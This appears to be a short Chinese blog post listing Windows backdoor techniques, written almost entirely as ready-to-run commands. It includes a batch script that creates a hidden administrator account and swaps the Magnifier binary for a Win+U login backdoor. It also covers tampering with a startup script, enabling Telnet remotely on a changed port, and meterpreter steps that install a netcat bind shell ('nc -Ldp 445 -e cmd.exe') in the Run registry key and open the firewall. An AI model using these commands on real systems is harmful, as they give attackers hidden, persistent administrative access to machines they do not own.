1. 程式人生 > >Windows後門小計

Windows後門小計

嗅探欺騙:



在目標機上安裝嗅探工具竊取管理員的密碼

放大鏡替換:


 

構造批處理:

  @echo off
  net user gslw$ test168 /add
  net localgroup administrators gslw$ /add
  %Windir%\system32\nagnify.exe
  exit
轉換exe檔案:
battoexe等工具
檔案替換:
  @echo off
  copy %Windir%\system32\dllcache\magnify.exe nagnify.exe
  copy %Windir%\system32\magnify.exe nagnify.exe
  replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache
  replace.exe %Windir%\magnify.exe %Windir%\system32
  exit
後門利用:
Win+U啟動輔助工具項,開啟放大鏡即可

組策略欺騙:



在windows開關機啟動指令碼中做手腳:
@echo off & net user gslw$ test168 /add && netlocalgroup administrators gslw$ /add & exit

telnet利用:



遠端改埠:“tlntadmn config \\192.168.1.9 port=800 -u gslw -p test168 ”
在目標機開啟:
tlntadmn config port=2233 //修改 telnet預設埠
sc config tlntsvr start= auto //設定啟動型別為自啟動
net start telnet //開啟telnet服務項
tlntadmn config sec =passwd //設定密碼
tlntadmn config port = 800 //設定埠
遠端登陸:telnet 192.168.1.9 800 //鍵入賬號密碼即可連線

msf(Netcat.exe):



上傳到目標系統:meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
檢視自啟:meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
設定自啟:meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'
檢查確認:meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
開啟cmd :meterpreter > execute -f cmd -i
開放445埠:netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
檢查是配置:netsh firewall show portopening
後門使用:nc -v 172.16.104.128 445